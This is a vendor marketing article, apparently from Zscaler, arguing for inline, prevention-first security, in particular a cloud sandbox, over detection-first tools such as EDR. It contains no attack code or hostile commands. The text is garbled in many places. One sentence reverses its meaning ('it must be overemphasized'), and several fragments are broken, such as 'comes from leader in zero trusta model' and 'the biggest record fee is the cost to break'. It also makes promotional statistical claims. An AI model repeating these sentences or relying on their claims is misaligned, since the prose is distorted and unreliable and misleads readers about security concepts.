Why Your Detect Security First Approach Isn’t Working
Stopping new threats and evading them is one of the biggest challenges in cybersecurity. This is one of the biggest reasons why attacks have increased dramatically in the past year again, despite an estimated $172 billion spent on global cybersecurity by 2022.
Armed with cloud-based tools and backed by a sophisticated network of affiliates, threat actors can develop new and circumvent malware faster than organizations can update their protections.
Relying on malware signatures and block lists for these rapidly changing attacks is futile. As a result, SOC toolkits now largely revolve around threat detection and investigation. If the attacker can get past your initial block, you expect your tool to pick it up at some point in the chain of attack. Every organization’s digital architecture is now featured with security controls that log anything that is potentially harmful. Security analysts study these logs and determine what to investigate further.
Does it work? Let’s look at the numbers:
- 76% of security teams said they were unable to achieve their goals due to a shortage of staff
- 56% of attacks took months—or longer—to be discovered
- Attacks are on the rise: global cybercrime losses are expected to reach $10.5 trillion by 2025
Obviously, something needs to change. Detection technology serves an important purpose and investing in it does not Wrongbut it must be overemphasized.
Organizations need to return to prioritizing threat prevention first and foremost—and this is where it comes from leader in zero trusta model that basically assumes your preventative controls have failed and you’re actively being violated at any given time.
The end point is just the starting point
While many security categories represent gaps in detection-first security strategies, let’s look at one popular category in particular: endpoint detection and response (EDR).
EDR adoption has grown rapidly. Already a $2 billion industry, that is growing at a CAGR of 25.3%. It makes sense: most attacks start from an endpoint, and if you detect them early in the attack chain, you minimize their impact. A good EDR solution also provides rich endpoint telemetry to help with investigation, compliance, and finding and disabling vulnerabilities.
Endpoint security is an area worth investing in—and a important component of zero trust—but that’s not the whole picture. Despite vendor claims of “extended” detection and response that unifies data across an enterprise, XDR solutions do not provide in-depth defenses on their own. EDR has antivirus to stop known malware, but they usually allow all other traffic to pass through, relying on analytics to finally detect what the AV has missed.
All tools have drawbacks, and EDR is no exception, because:
Not all attacks start from an endpoint. The internet is a new network, and most organizations have a wide variety of data and applications stored in multiple clouds. They also frequently use devices such as VPNs and firewalls that can be routed from the internet. What’s revealed subject to attack. Zscaler ThreatLabz found that 30% of SSL-based attacks are hiding in cloud-based file sharing services like AWS, Google Drive, OneDrive, and Dropbox.
Not all endpoints are managed. EDR relies on agents being installed on every IT managed device, but it doesn’t account for the myriad scenarios in which unmanaged endpoints may touch your data or network: IoT and OT devices, work-deployed personal (BYOD) endpoints, third-party partners and contractors with access to data, recent mergers or acquisitions, even guests who come to your office to use Wi-Fi.
EDR can be skipped. All security tools have their drawbacks, and EDR has been proven it’s easy enough to avoid using some common techniques, such as exploiting system calls. Attackers use encryption and obfuscation techniques to automatically create new PDFs, Microsoft 365 documents, and other files that can change malware fingerprints and bypass traditional cybersecurity models undetected.
Modern threats move very fast. Today’s ransomware strains, almost all of them available for purchase on the dark web for any would-be cyber criminal, encrypting data can be too fast for detection-based technologies to be useful. LockBit v3.0 can encrypt 25,000 files in a minute, and that’s it not even the fastest ransomware out there. In contrast, the average time to detect and mitigate breaches is measured at 280 days. That’s enough time for LockBit to encrypt more than 10 billion files.
Get your security in line
It is true that signature-based antivirus technology is no longer sufficient to stop sophisticated attacks. But it’s also true that the same AI-powered analytics behind detection technology can (and should!) be used for prevention, not just detection, when delivered inline. This prevention strategy needs to account for your entire infrastructure, not just your endpoints or other parts of your architecture.
The sandbox is a prime example of a security tool that can be used in this way. The sandbox provides real-time protection against sophisticated and unknown threats by analyzing suspicious files and URLs in a secure and isolated environment. Passing it inline (not as a passthrough) means the file isn’t allowed to proceed until after the solution renders a verdict.
The Zscaler Zero Trust Exchange platform includes a cloud-native proxy that checks all traffic, encrypted or not, to enable secure access. As proxies, platform-layered controls—including an integrated smart sandbox—are all delivered in line with a prevention-first approach.
Complementing your detection technology with Zscaler’s inline cloud native sandbox gives you:
AI-powered real-time protection against zero-day threats
Zscaler uses advanced machine learning algorithms continuously refined by the world’s largest security cloud, which processes more than 300 billion transactions per day. This algorithm analyzes suspicious files and URLs in real time, detecting and blocking potential threats before they can cause damage.
It starts with a pre-filter analysis that checks file contents against 40+ threat feeds, antivirus signatures, hash block lists, and YARA rules for known compromise indicators (IOCs). By reducing the number of files required for deeper analysis, AI/ML models work more effectively. When files remain unknown or suspicious after initial triage, the Zscaler Sandbox blows them up to perform powerful static, dynamic, and secondary analyses, including secondary payload and code analysis that detects advanced evasion techniques. Once done, a report is generated with a threat score and actionable verdict, blocking malicious and suspicious files based on policy configurations.
One of the cloud’s biggest selling points is the ability to quickly scale up or down to meet the needs of organizations of all sizes. Security controls deployed in the cloud are naturally easier to provision and manage, giving your organization the flexibility to adapt to changing security needs.
Cost is one of the key inputs that determine many security strategies, and it comes in many forms: user productivity, operational efficiency, hardware costs, and so on. But the biggest record fee is the cost to break. By preventing attacks, you eliminate downtime, reputation damage, lost business, and repair costs, all of which can easily add up to seven figures for a single attack. ESG found that the average organization using Zero Trust Exchange experienced a 65% reduction in malware, an 85% reduction in ransomware, and a 27% reduction in data breaches, contributing to an overall ROI of 139%.
Comprehensive threat protection
Zero Trust Exchange provides comprehensive threat prevention, detection, and analysis capabilities, providing organizations with a uniform security control strategy across all locations, users, and devices. The Zscaler Sandbox can analyze files anywhere, not just the endpoint, and integrates with additional capabilities such as DNS security, browser isolation (for fileless attacks), data loss prevention, application and workload security, fraud and many others. It provides a complete picture of your organization’s security posture and the in-depth defenses that the security team strives for.
Prevention comes first
In the arms race against attackers, security teams need to prioritize inline security controls over passthrough detection technologies. Files should never be allowed onto an endpoint or network unless you’re sure the file is benign—because if it turns out to be malicious, you likely won’t know about it until after the damage has been done.
If you want to learn more about the Zscaler Zero Trust Exchange, visit zscaler.com.